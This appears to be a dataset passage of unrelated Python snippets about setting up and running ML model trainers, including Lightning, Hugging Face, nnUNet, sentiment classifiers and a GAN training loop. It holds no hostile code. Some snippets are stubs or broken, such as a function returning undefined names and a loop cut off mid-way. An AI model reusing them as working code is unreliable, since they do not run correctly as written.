_setup_training(self, params, **kwargs):\n model_params = params.permute_training_on_top().model\n\n model_kwargs = {**model_params.fixed, **model_params.variable}\n\n model = self.model_cls(**model_kwargs)\n\n training_params = params.permute_training_on_top().training\n losses = training_params.nested_get(\"losses\")\n optimizer_cls = training_params.nested_get(\"optimizer_cls\")\n optimizer_params = training_params.nested_get(\"optimizer_params\")\n train_metrics = training_params.nested_get(\"train_metrics\", {})\n lr_scheduler_cls = training_params.nested_get(\"lr_sched_cls\", None)\n lr_scheduler_params = training_params.nested_get(\"lr_sched_params\",\n {})\n val_metrics = training_params.nested_get(\"val_metrics\", {})\n\n # necessary for resuming training from a given path\n save_path = kwargs.pop(\"save_path\", os.path.join(\n self.save_path,\n \"checkpoints\",\n \"run_%02d\" % self._run))\n\n return self.trainer_cls(\n network=model,\n save_path=save_path,\n losses=losses,\n key_mapping=self.key_mapping,\n optimizer_cls=optimizer_cls,\n optimizer_params=optimizer_params,\n train_metrics=train_metrics,\n val_metrics=val_metrics,\n lr_scheduler_cls=lr_scheduler_cls,\n lr_scheduler_params=lr_scheduler_params,\n optim_fn=self._optim_builder,\n save_freq=self.checkpoint_freq,\n **kwargs\n )", "def build_trainer(cfg, hparams):\n name = cfg.trainer.name\n return TRAINER_REGISTRY.get(name)(cfg, hparams)", "def wrapper_train(tree_depth, demos, validation_demos, pred_data=[None,None], verbose=True):\n return train(program_gen_step_size = 1000, \n num_programs = NUM_PROGRAMS, \n num_dts = 5, \n max_num_particles = 25, \n input_demos = demos, \n further_demos = validation_demos, \n tree_depth = tree_depth, \n return_prior=True,\n pred_data=pred_data,\n verbose=verbose)", "def setup(self, trainer: \"pl.Trainer\") -> None:\n trainer_fn = trainer.state.fn\n if trainer_fn == TrainerFn.FITTING:\n super().setup(trainer)\n else:\n assert self.accelerator is not None\n self.accelerator.setup(trainer)\n\n # move the model to the correct device\n self.model_to_device()\n self.setup_precision_plugin()\n assert self.model is not None", "def train_model(args, train_exs: List[SentimentExample]) -> SentimentClassifier:\n # Initialize feature extractor\n nltk.download('stopwords')\n stop_words = set(stopwords.words('english'))\n\n if args.model == \"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n feat_extractor = UnigramFeatureExtractor(Indexer(), train_exs, stop_words)\n elif args.feats == \"BIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = BigramFeatureExtractor(Indexer(), train_exs, stop_words)\n elif args.feats == \"BETTER\":\n # Add additional preprocessing code here\n feat_extractor = BetterFeatureExtractor(Indexer(), train_exs, stop_words)\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model", "def main(args):\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def build_task_trainer(unfixed_params):\n logdir = unfixed_params['logdir']\n gpu_ids_abs = unfixed_params[\"gpu_ids_abs\"]\n depth = unfixed_params[\"depth\"]\n lr = unfixed_params[\"lr\"]\n\n batch_size = 32\n opt_name = \"RMSprop\"\n lr_decay = 0.94\n decay_position= 1\n position_type = \"epoch\"\n weight_decay = 2e-5\n momentum = 0\n nepochs = 100\n num_class = 10\n torch.backends.cudnn.benchmark = True\n mnist = FashionMNIST(root=\"datasets/fashion_data\", batch_size=batch_size, num_workers=2)\n net = Model(SimpleModel(depth), gpu_ids_abs=gpu_ids_abs, init_method=\"kaiming\", verbose=False)\n opt = Optimizer(net.parameters(), opt_name, lr_decay, decay_position, position_type=position_type,\n lr=lr, weight_decay=weight_decay, momentum=momentum)\n Trainer = FashionClassTrainer(logdir, nepochs, gpu_ids_abs, net, opt, mnist, num_class)\n return Trainer", "def stft():\n trainer = {\n 'model': {\n 'encoder': {\n 'factory': 'padertorch.contrib.examples.source_separation.tasnet.tas_coders.StftEncoder'\n },\n 'decoder': {\n 'factory': 'padertorch.contrib.examples.source_separation.tasnet.tas_coders.IstftDecoder'\n },\n }\n }", "def on_start_(\n self,\n super_callback: \"AllennlpWandbCallback\",\n trainer: \"GradientDescentTrainer\",\n is_primary: bool = True,\n **kwargs: Any,\n ) -> None:\n self.trainer = trainer", "def train_main(cls):\n launcher = cls()\n launcher.launch()", "def train(self):\n\t\traise NotImplementedError", "def train(self, train_loader):\n pass", "def _init_trainer(self, params = None, **kwargs):\n self.trainer = QTreeTrainer(self, params = params, **kwargs)", "def with_updates(**overrides) -> Type[Trainer]:\n return build_trainer(**dict(original_kwargs, **overrides))", "def train():\n pass", "def create_trainer(criterion, denominator):\n variables = re.split(\",|\\|\", denominator)\n variables.sort()\n\n assert(set(variables) == set(criterion.variables()))\n\n # Allocate the batch-feeder based on the specified random variables.\n def feeder(batch, criterion, accelerator):\n dictionary = {}\n for index, key in enumerate(variables):\n dictionary[key] = batch[index].to(accelerator, non_blocking=True)\n\n return criterion(**dictionary)\n\n # Create the trainer object with the desired criterion.\n class Trainer(BaseAmortizedRatioEstimatorTrainer):\n\n def __init__(self,\n estimator,\n optimizer,\n dataset_train,\n criterion,\n accelerator=hypothesis.accelerator,\n batch_size=hypothesis.default.batch_size,\n checkpoint=None,\n dataset_test=None,\n epochs=hypothesis.default.epochs,\n lr_scheduler=None,\n identifier=None,\n shuffle=True,\n workers=hypothesis.default.dataloader_workers):\n super(Trainer, self).__init__(\n accelerator=accelerator,\n batch_size=batch_size,\n checkpoint=checkpoint,\n criterion=criterion,\n dataset_test=dataset_test,\n dataset_train=dataset_train,\n epochs=epochs,\n estimator=estimator,\n feeder=feeder,\n identifier=identifier,\n lr_scheduler_epoch=lr_scheduler,\n optimizer=optimizer,\n shuffle=shuffle,\n workers=workers)\n\n return Trainer", "def initialize(self, training=True, force_load_plans=False, num_epochs=500, prev_trainer=None):\n # -- The Trainer embodies the actual model that will be used as foundation to continue training on -- #\n # -- It should be already initialized since the output_folder will be used. If it is None, the model will be initialized and trained. -- #\n # -- Further the trainer needs to be of class nnUNetTrainerV2 or nnUNetTrainerMultiHead for this method, nothing else. -- #\n # -- Set prev_trainer correctly as class instance and not a string -- #\n self.trainer = prev_trainer\n\n # -- Set nr_epochs to provided number -- #\n self.max_num_epochs = num_epochs\n\n # -- Initialize the trained_on_tasks and load trained_on_folds -- #\n trained_on_tasks = list()\n trained_on_folds = self.already_trained_on.get(str(self.fold), list())\n \n # -- Reset the trained_on_tasks if the trained_on_folds exist for the current fold -- #\n if isinstance(trained_on_folds, dict):\n trained_on_tasks = trained_on_folds.get('finished_training_on', list())\n\n # -- The new_trainer indicates if the model is a new multi head model, -- #\n # -- ie. if it has been trained on only one task so far (True) or on more than one (False) -- #\n if len(trained_on_tasks) > 1:\n self.new_trainer = False\n else:\n self.new_trainer = True\n \n super().initialize(training, force_load_plans) # --> This updates the corresponding variables automatically since we inherit this class", "def train(self):\n model = TreeTrainer.train(self)\n model['assignments'] = self._assignments\n model['suffstats'] = {\n 'ragged_index': self._table.ragged_index,\n 'vert_ss': self._vert_ss,\n 'edge_ss': self._edge_ss,\n 'feat_ss': self._feat_ss,\n 'meas_ss': self._meas_ss,\n }\n return model", "def train( # type: ignore\n self,\n pl_trainer_args: Dict[str, Any],\n model_args: Dict[str, Union[float, str, int]],\n dataset_args: Dict[str, Union[float, str, int]],\n dataset: GFlowNetDataset,\n environment: GraphBuildingEnv,\n context: GraphBuildingEnvContext,\n task: GFlowNetTask,\n ) -> None:\n\n logger.info(f\"Trainer arguments: {pl_trainer_args}\")\n\n if pl_trainer_args[\n \"resume_from_checkpoint\"\n ] is not None and not pl_trainer_args[\"resume_from_checkpoint\"].endswith(\n \".ckpt\"\n ):\n pl_trainer_args[\"resume_from_checkpoint\"] = None\n\n pl_trainer_args[\"callbacks\"] = {\n \"model_checkpoint_callback\": {\"save_top_k\": pl_trainer_args[\"save_top_k\"]}\n }\n\n pl_trainer_args[\"callbacks\"] = self.add_callbacks(pl_trainer_args[\"callbacks\"])\n\n pl_trainer_args[\"logger\"] = TensorBoardLogger(\n pl_trainer_args[\"save_dir\"], name=pl_trainer_args[\"basename\"]\n )\n\n trainer = Trainer(\n profiler=pl_trainer_args[\"profiler\"],\n logger=pl_trainer_args[\"logger\"],\n log_every_n_steps=pl_trainer_args[\"trainer_log_every_n_steps\"],\n callbacks=pl_trainer_args[\"callbacks\"],\n max_epochs=pl_trainer_args[\"epochs\"],\n strategy=pl_trainer_args[\"strategy\"],\n fast_dev_run=pl_trainer_args[\"development_mode\"],\n )\n\n data_module, model_module = self.get_data_and_model_modules(\n model_args,\n dataset_args,\n pl_trainer_args,\n dataset,\n environment,\n context,\n task,\n )\n trainer.fit(model_module, data_module)", "def train(self, ):\n raise NotImplementedError", "def train(self):\n raise NotImplementedError", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def train(self):\n raise NotImplementedError()", "def train_model(args, train_exs: List[SentimentExample]) -> SentimentClassifier:\n indexer = Indexer()\n stop_words = set(stopwords.words('english'))\n punkt = (',', '.', '...', '?', '\\'', '\\'\\'', '!', ':', ';')\n # Initialize feature extractor\n if args.model == \"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n # Generate vocabulary\n for ex in train_exs:\n for word in ex.words:\n if word.lower() not in stop_words and word.lower() not in punkt:\n indexer.add_and_get_index(word.lower())\n feat_extractor = UnigramFeatureExtractor(indexer)\n elif args.feats == \"BIGRAM\":\n # Generate vocabulary\n for ex in train_exs:\n for i in range(0, len(ex.words) - 1):\n if stop_words.__contains__(ex.words[i]) and stop_words.__contains__(ex.words[i + 1]) or (\n punkt.__contains__(ex.words[i]) or punkt.__contains__(ex.words[i + 1])):\n continue\n bigram = ex.words[i] + ' ' + ex.words[i + 1]\n indexer.add_and_get_index(bigram.lower())\n feat_extractor = BigramFeatureExtractor(indexer)\n elif args.feats == \"BETTER\":\n # Generate vocabulary\n cnt = Counter()\n for ex in train_exs:\n cnt.update(\n word.lower() for word in ex.words if word.lower() not in stop_words and word.lower() not in punkt)\n cnt = dict(cnt.most_common(int(cnt.__len__() * 0.75)))\n for keys in cnt.keys():\n indexer.add_and_get_index(keys)\n feat_extractor = BetterFeatureExtractor(indexer)\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model", "def main(unused_argv):\n model_params = sketch_rnn_model.get_default_hparams()\n if FLAGS.hparams:\n model_params.parse(FLAGS.hparams)\n trainer(model_params)", "def trainModel( self, featureTrain, classTrain):", "def _create_pipiline(tokenizer, model, device, framework):\n tg_params = dict(\n task=\"text-generation\", tokenizer=tokenizer, model=model,\n framework=\"pt\", device=device,\n )\n text_generation_pipiline = pipeline(**tg_params)\n return text_generation_pipiline", "def make_training_nodes(discriminator):\n return classification_metrics(\n [1],\n discriminator.output_node,\n \"discriminator_training\",\n variables=discriminator.get_variables(),\n )", "def main():\n model = th.nn.Linear(1, 1)\n optim = th.optim.Adam(model.parameters(), lr=1e-3)\n\n def loss_fn(model, data):\n x, target = data\n output = model(x)\n loss = th.mean(th.square(output - target))\n return loss\n\n def get_loader():\n while True:\n # NOTE(ycho): `32` here is a dummy fictitious batch size.\n x = th.empty((32, 1), dtype=th.float32)\n y = th.empty((32, 1), dtype=th.float32)\n yield (x, y)\n\n trainer = Trainer(\n Trainer.Settings(train_steps=1),\n model,\n optim,\n loss_fn,\n Hub(),\n get_loader())\n\n trainer.train()", "def test_train(self):\n print \"x=\",self.trainer.train()", "def train(self) -> None:\n\n # Check if in the saved model path there is already a trained model\n if self.config.TRN_HYPERP[\"save_path\"]:\n if tf.saved_model.contains_saved_model(self.config.TRN_HYPERP[\"save_path\"]):\n print(\"INFO: An existing saved model will be used for inference\\n\")\n else:\n params = {**self.config.TRN_HYPERP, **self.config.DATASET_HYPERP}\n trainer = Trainer(**params)\n\n print(f\"INFO: Starting training ... \\n\")\n start_time = time.time()\n trainer.train()\n print(f\"\\nINFO: Training completed in {round((time.time() - start_time)/60, 2)} minutes.\\n\")\n\n # Instantiate the saved translator for inference\n saved_path = self.config.TRN_HYPERP[\"save_path\"]\n self.saved_translator = tf.saved_model.load(saved_path)\n else:\n print(\"INFO: Path to save model wasn't provided in config file. Can't train the model\\n\")", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def _train_model(self):\n raise NotImplementedError()", "def train_entry_point():", "def create_training(logits):\r\n \r\n\r\n return train_op, loss, label_ph", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def create_training(self, weight_spacing = 1.0, weight_bending = 1.0, weight_head_tail = 1.0):\n self.skeleton = tf.placeholder(\"float32\", [1, self.skeleton_size, 2]);\n #self.skeleton_valid = tf.placeholder(\"int32\", [1]);\n #self.head_tail = tf.placeholder(\"float32\", [1, self.head_tail_size, 2]);\n #self.head_tail_valid = tf.placeholder(\"int32\", [1]);\n \n #self.cost = self.create_cost(self.output, self.skeleton, self.skeleton_valid, self.head_tail, self.head_tail_valid, \n # weight_spacing = weight_spacing, weight_bending = weight_bending); #, weight_head_tail = weight_head_tail);\n self.cost = self.create_cost(self.output, self.skeleton, weight_spacing = weight_spacing, weight_bending = weight_bending); \n \n #trainer\n self.trainer = tf.train.RMSPropOptimizer(0.00025,0.99,0.0,1e-6).minimize(self.cost)", "def TracerFactory():\n return Tracer(colors='Linux')", "def train(config, data_path):\n register_data(data_path, prefix='yeast_cells_')\n os.makedirs(config.OUTPUT_DIR, exist_ok=True)\n trainer = DefaultTrainer(config)\n trainer.resume_or_load(resume=True)\n trainer.train()\n return trainer", "def for_supervised_fine_tuning(\n cls,\n formatting_func: Callable[[Dict[str, Any]], Union[None, str, List[str], Iterator[str]]],\n ) -> \"TrainingTaskForSFT\":\n return TrainingTaskForSFT(formatting_func=formatting_func)", "def create_learner(args, df: pd.DataFrame) -> Learner:\n\n # Load tokenizer, model and config from Hugging Face's Transformers\n # Tokenizer\n transformer_tokenizer = AutoTokenizer.from_pretrained(args.pretrained_model_name)\n # Config\n transformer_config = AutoConfig.from_pretrained(args.pretrained_model_name)\n transformer_config.num_labels = df[args.label_col].nunique()\n # Model\n transformer_model = AutoModelForSequenceClassification.from_pretrained(\n args.pretrained_model_name, config=transformer_config\n )\n if args.anonymized_tokens:\n special_tokens_dict = {\n 'additional_special_tokens': ['xxnum','xxphone', 'xxname', 'xxemail', 'xxurl'],\n }\n transformer_tokenizer.add_special_tokens(special_tokens_dict)\n transformer_model.resize_token_embeddings(len(transformer_tokenizer)) \n # save tokenizer for later\n transformer_tokenizer.save_pretrained(args.export_dir)\n\n # custom glue for transformers/fastai tokenizer\n # this is a hack to use Hugging Face's Transformers inside Fast.ai\n transformer_base_tokenizer = TransformersBaseTokenizer(\n pretrained_tokenizer=transformer_tokenizer,\n model_type=args.pretrained_model_type,\n )\n fastai_tokenizer = Tokenizer(\n tok_func=transformer_base_tokenizer, pre_rules=[], post_rules=[]\n )\n transformer_vocab = TransformersVocab(tokenizer=transformer_tokenizer)\n numericalize_processor = NumericalizeProcessor(vocab=transformer_vocab)\n tokenize_processor = TokenizeProcessor(\n tokenizer=fastai_tokenizer, include_bos=False, include_eos=False\n )\n transformer_processor = [tokenize_processor, numericalize_processor]\n\n # Create Fastai Databunch\n databunch = (\n TextList.from_df(\n df, cols=args.text_col, processor=transformer_processor, path=args.cache_dir\n )\n .split_from_df(col=args.validation_col)\n .label_from_df(cols=args.label_col)\n .databunch(\n bs=args.batch_size,\n pad_first=args.pad_first,\n pad_idx=transformer_tokenizer.pad_token_id,\n )\n )\n\n # Wrap Transformer Model into Custom Glue\n custom_transformer_model = CustomTransformerModel(\n transformer_model=transformer_model\n )\n\n # wrap optimizer into partial to work with fastai training loop\n CustomAdamW = partial(AdamW, correct_bias=False)\n\n learner = Learner(\n databunch,\n custom_transformer_model,\n opt_func=CustomAdamW,\n callback_fns=[\n partial(\n EarlyStoppingCallback,\n monitor=\"valid_loss\",\n min_delta=args.min_delta,\n patience=args.pacience,\n ),\n ],\n metrics=[accuracy],\n )\n\n if args.track_with_wb:\n # wrap callback into partial to work with fastai training loop\n CustomWandbCallback = partial(WandbCallback, seed=args.random_seed)\n learner.callback_fns.append(CustomWandbCallback)\n\n # Train in FP16 precision mode.\n # TODO test export and inference on CPU\n if args.use_fp16:\n learner = learner.to_fp16()\n\n return learner", "def get_trainer(self):\n return AutoEncoderTrainer", "def get_trainer(name, disable_logging=False):\n return PluginLoader._import(\"train.trainer\", name, disable_logging)", "def Train(w, x, u=None, nep=20, gdy=0, **kwd):\n # the trainer class\n from xnnt.tnr.cmb import Comb as Tnr\n\n # layer-wise greedy pre-training (incremental).\n if gdy > 0:\n for i in range(1, len(w.sa)):\n sw = w.sub(0, i)\n print('pre-train sub-stack:', sw)\n tr = Tnr(sw, x, u=u)\n tr.tune(gdy)\n\n # whole stack fine-tuning\n print('train stack:', w)\n tr = Tnr(w, x, u=u, **kwd)\n tr.tune(nep)\n\n return tr", "def train_naive(): # add arguments as needed\n pass", "def get_train_routine(\n self,\n ) -> Callable[\n [\n torch.utils.data.DataLoader,\n torch.utils.data.DataLoader,\n argparse.Namespace,\n torch.nn.Module,\n torch.optim.Optimizer,\n torch.optim.Optimizer,\n Progress,\n TaskID,\n ],\n None,\n ]:\n pass", "def prepare_training(self, config: TreeConfigParser) -> None:\n callbacks.initiate_wb(config)\n generator = generators.Generator(\n config.get(\"data.output.label.choice\"),\n config.get_int(\"model.batch_size\"),\n config.get_int(\"data.input.aug.rot.range\"),\n config.get_float(\"data.input.aug.shift.range\"),\n config.get_bool(\"data.input.aug.flip.bool\"),\n config.get_float(\"data.input.aug.shear.range\"),\n config.get_float(\"data.input.aug.zoom.range\"),\n )\n list_callbacks = callbacks.create_list_callbacks(\n config.get(\"orga.save.directory\"),\n config.get(\"orga.save.folder\"),\n config.get_bool(\"model.callback.modelcheckpoint\"),\n config.get_bool(\"model.callback.reducelronplateau\"),\n config.get_bool(\"model.callback.earlystopping\"),\n config.get_bool(\"model.callback.wandb\"),\n )\n self.trainer = Trainer(\n generator,\n list_callbacks,\n config.get_int(\"model.batch_size\"),\n config.get_int(\"model.epochs.number\"),\n )", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train_tier(args: argparse.Namespace, hp: HParams, tier: int, extension_architecture: str,\n timestamp: str, tensorboardwriter: TensorboardWriter,\n logger: logging.Logger) -> None:\n logger.info(f\"Start training of tier {tier}/{hp.network.n_tiers}\")\n\n # Setup the data ready to be consumed\n train_dataloader, test_dataloader, num_samples = get_dataloader(hp)\n\n # Setup tier\n # Calculate size of FREQ dimension for this tier\n tier_freq = tierutil.get_size_freqdim_of_tier(n_mels=hp.audio.mel_channels,\n n_tiers=hp.network.n_tiers,\n tier=tier)\n\n if tier == 1:\n model = Tier1(tier=tier,\n n_layers=hp.network.layers[tier - 1],\n hidden_size=hp.network.hidden_size,\n gmm_size=hp.network.gmm_size,\n freq=tier_freq)\n else:\n model = Tier(tier=tier,\n n_layers=hp.network.layers[tier - 1],\n hidden_size=hp.network.hidden_size,\n gmm_size=hp.network.gmm_size,\n freq=tier_freq)\n model = model.to(hp.device)\n model.train()\n\n # Setup loss criterion and optimizer\n criterion = GMMLoss()\n optimizer = torch.optim.RMSprop(params=model.parameters(),\n lr=hp.training.lr,\n momentum=hp.training.momentum)\n\n # Check if training has to be resumed from previous checkpoint\n if args.checkpoint_path is not None:\n model, optimizer = resume_training(args, hp, tier, model, optimizer, logger)\n else:\n logger.info(f\"Starting new training on dataset {hp.data.dataset} with configuration file \"\n f\"name {hp.name}\")\n\n # Train the tier\n total_iterations = 0\n loss_logging = 0 # accumulated loss between logging iterations\n loss_save = 0 # accumulated loss between saving iterations\n prev_loss_onesample = 1e8 # used to compare between saving iterations and decide whether or not\n # to save the model\n\n for epoch in range(hp.training.epochs):\n logger.info(f\"Epoch: {epoch}/{hp.training.epochs} - Starting\")\n for i, (waveform, utterance) in enumerate(train_dataloader):\n\n # 1.1 Transform waveform input to melspectrogram and apply preprocessing to normalize\n waveform = waveform.to(device=hp.device, non_blocking=True)\n spectrogram = transforms.wave_to_melspectrogram(waveform, hp)\n spectrogram = audio_normalizing.preprocessing(spectrogram, hp)\n # 1.2 Get input and output from the original spectrogram for this tier\n input_spectrogram, output_spectrogram = tierutil.split(spectrogram=spectrogram,\n tier=tier,\n n_tiers=hp.network.n_tiers)\n length_spectrogram = input_spectrogram.size(2)\n # 2. Clear the gradients\n optimizer.zero_grad()\n # 3. Compute the model output\n if tier == 1:\n # generation is unconditional so there is only one input\n mu_hat, std_hat, pi_hat = model(spectrogram=input_spectrogram)\n else:\n # generation is conditional on the spectrogram generated by previous tiers\n mu_hat, std_hat, pi_hat = model(spectrogram=output_spectrogram,\n spectrogram_prev_tier=input_spectrogram)\n # 4. Calculate the loss\n loss = criterion(mu=mu_hat, std=std_hat, pi=pi_hat, target=output_spectrogram)\n del spectrogram\n del mu_hat, std_hat, pi_hat\n\n # 4.1 Check if loss has exploded\n if torch.isnan(loss) or torch.isinf(loss):\n error_msg = f\"Loss exploded at Epoch: {epoch}/{hp.training.epochs} - \" \\\n f\"Iteration: {i * hp.training.batch_size}/{num_samples}\"\n logger.error(error_msg)\n raise Exception(error_msg)\n\n # 5. Perform backpropagation\n loss_cpu = loss.item()\n loss.backward()\n optimizer.step()\n\n # 6. Logging and saving model\n loss_oneframe = loss_cpu / (length_spectrogram * hp.training.batch_size)\n loss_logging += loss_oneframe # accumulated loss between logging iterations\n loss_save += loss_oneframe # accumulated loss between saving iterations\n\n # 6.1 Save model (if is better than previous tier)\n if (total_iterations + 1) % hp.training.save_iterations == 0:\n # Calculate average loss of one sample of a batch\n loss_onesample = int(loss_save / hp.training.save_iterations)\n # if loss_onesample of these iterations is lower, the tier is better and we save it\n if loss_onesample < prev_loss_onesample:\n path = f\"{hp.training.dir_chkpt}/tier{tier}_{timestamp}_loss{loss_onesample}.pt\"\n torch.save(obj={'dataset': hp.data.dataset,\n 'tier_idx': tier,\n 'hp': hp,\n 'epoch': epoch,\n 'iterations': i,\n 'total_iterations': total_iterations,\n 'tier': model.state_dict(),\n 'optimizer': optimizer.state_dict()}, f=path)\n logger.info(f\"Model saved to: {path}\")\n prev_loss_onesample = loss_onesample\n loss_save = 0\n\n # 6.2 Logging\n if (total_iterations + 1) % hp.logging.log_iterations == 0:\n # Calculate average loss of one sample of a batch\n loss_onesample = int(loss_logging / hp.logging.log_iterations)\n tensorboardwriter.log_training(hp, loss_onesample, total_iterations)\n logger.info(f\"Epoch: {epoch}/{hp.training.epochs} - \"\n f\"Iteration: {i * hp.training.batch_size}/{num_samples} - \"\n f\"Loss: {loss_onesample}\")\n loss_logging = 0\n\n # 6.3 Evaluate\n if (total_iterations + 1) % hp.training.evaluation_iterations == 0:\n evaluation(hp, tier, test_dataloader, model, criterion, logger)\n total_iterations += 1\n\n # After finishing training: save model, hyperparameters and total loss\n path = f\"{hp.training.dir_chkpt}/tier{tier}_{timestamp}_final.pt\"\n torch.save(obj={'dataset': hp.data.dataset,\n 'tier_idx': tier,\n 'hp': hp,\n 'epoch': epoch,\n 'iterations': evaluation(hp, tier, test_dataloader, model, criterion,\n logger),\n 'total_iterations': total_iterations,\n 'tier': model.state_dict(),\n 'optimizer': optimizer.state_dict()}, f=path)\n logger.info(f\"Model saved to: {path}\")\n tensorboardwriter.log_end_training(hp=hp, loss=-1)\n logger.info(\"Finished training\")", "def get_trainer(config):\r\n # creating rllib config\r\n rl_config = build_trainer_config(config=config)\r\n return TRAINERS[config['_trainer']](config=rl_config)", "def train_with_control_vec_pretrianing(builder, train_ds, eval_ds):\n num_train_examples = builder.info.splits['train'].num_examples\n \n task = {'name': 'extr', 'excluded_label': None}\n num_classes = builder.info.features[task['name']].num_classes \n task['num_classes'] = num_classes\n\n model = models_lib.Model(num_classes=num_classes)\n\n main_task = {'name': 'label', 'excluded_label': 3}\n num_classes = builder.info.features[main_task['name']].num_classes - 1\n main_task['num_classes'] = num_classes \n\n lr_scheduler = tf.keras.experimental.CosineDecayRestarts(\n initial_learning_rate=0.0001, \n first_decay_steps=10*(num_train_examples//FLAGS.pretrain_bs),\n t_mul=2.0,\n m_mul=0.9,\n alpha=0.1)\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_scheduler)\n\n if FLAGS.ckpt: \n model, optimizer, ckpt, ckpt_manager = load_model(FLAGS.ckpt, model, optimizer)\n else: \n if FLAGS.save_model: \n ckpt = tf.train.Checkpoint(model=model, optimizer=optimizer)\n ckpt_manager = tf.train.CheckpointManager(\n checkpoint=ckpt, \n directory=FLAGS.model_dir+'/pretrain', \n max_to_keep=3 \n )\n else: \n ckpt=None\n ckpt_manager=None\n\n print('==========CONTROL VECTOR PRETRAIN==========')\n for epoch in range(FLAGS.pretrain_epochs):\n print('==========EPOCH: %s==========' % epoch)\n control_vec_pretrain(\n pretrain_ds=train_ds,\n model=model,\n optimizer=optimizer,\n task=task,\n epochs=1,\n lineareval_epochs=0,\n lineareval_task=None,\n eval_ds=None,\n ckpt_manager=ckpt_manager\n )\n\n head = model.sh\n model.sh = models_lib.SupervisedHead(main_task['num_classes'])\n linear_eval(train_ds, model, main_task, FLAGS.lineareval_epochs, eval_ds=eval_ds)\n\n model.sh = head\n\n model.sh = models_lib.SupervisedHead(main_task['num_classes'])\n linear_eval(train_ds, model, main_task, 30, eval_ds=eval_ds)\n evaluate(eval_ds, model, main_task)", "def train(self, *args, **kwargs):\n return self._train(*args, **kwargs)", "def train(self, *args, **kwargs):\n return self._train(*args, **kwargs)", "def train(settings=None):\n if not settings:\n settings = Settings()\n train_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.RandomHorizontalFlip(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n validation_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n\n train_dataset = CrowdDatasetWithUnlabeled(settings.train_dataset_path, 'train', transform=train_transform)\n train_dataset_loader = torch.utils.data.DataLoader(train_dataset, batch_size=settings.batch_size, shuffle=True,\n num_workers=settings.number_of_data_loader_workers)\n validation_dataset = CrowdDataset(settings.validation_dataset_path, 'validation', transform=validation_transform)\n validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=settings.batch_size,\n shuffle=False,\n num_workers=settings.number_of_data_loader_workers)\n\n gan = GAN()\n gpu(gan)\n D = gan.D\n G = gan.G\n discriminator_optimizer = Adam(D.parameters())\n generator_optimizer = Adam(G.parameters())\n\n step = 0\n epoch = 0\n\n if settings.load_model_path:\n d_model_state_dict, d_optimizer_state_dict, epoch, step = load_trainer(prefix='discriminator',\n settings=settings)\n D.load_state_dict(d_model_state_dict)\n discriminator_optimizer.load_state_dict(d_optimizer_state_dict)\n discriminator_optimizer.param_groups[0].update({'lr': settings.learning_rate, 'weight_decay': settings.weight_decay})\n if settings.load_model_path:\n g_model_state_dict, g_optimizer_state_dict, _, _ = load_trainer(prefix='generator',\n settings=settings)\n G.load_state_dict(g_model_state_dict)\n generator_optimizer.load_state_dict(g_optimizer_state_dict)\n generator_optimizer.param_groups[0].update({'lr': settings.learning_rate})\n\n running_scalars = defaultdict(float)\n validation_running_scalars = defaultdict(float)\n running_example_count = 0\n datetime_string = datetime.datetime.now().strftime(\"y%Ym%md%dh%Hm%Ms%S\")\n trial_directory = os.path.join(settings.log_directory, settings.trial_name + ' ' + datetime_string)\n os.makedirs(trial_directory, exist_ok=True)\n summary_writer = SummaryWriter(os.path.join(trial_directory, 'train'))\n validation_summary_writer = SummaryWriter(os.path.join(trial_directory, 'validation'))\n print('Starting training...')\n step_time_start = datetime.datetime.now()\n while epoch < settings.number_of_epochs:\n for examples, unlabeled_examples in train_dataset_loader:\n unlabeled_images = unlabeled_examples[0]\n # Real image discriminator processing.\n discriminator_optimizer.zero_grad()\n images, labels, _ = examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n current_batch_size = images.data.shape[0]\n predicted_labels, predicted_counts = D(images)\n real_feature_layer = D.feature_layer\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n loss = count_loss + (density_loss * 10)\n loss.backward()\n running_scalars['Labeled/Loss'] += loss.data[0]\n running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n running_scalars['Labeled/Count ME'] += (predicted_counts - labels.sum(1).sum(1)).mean().data[0]\n # 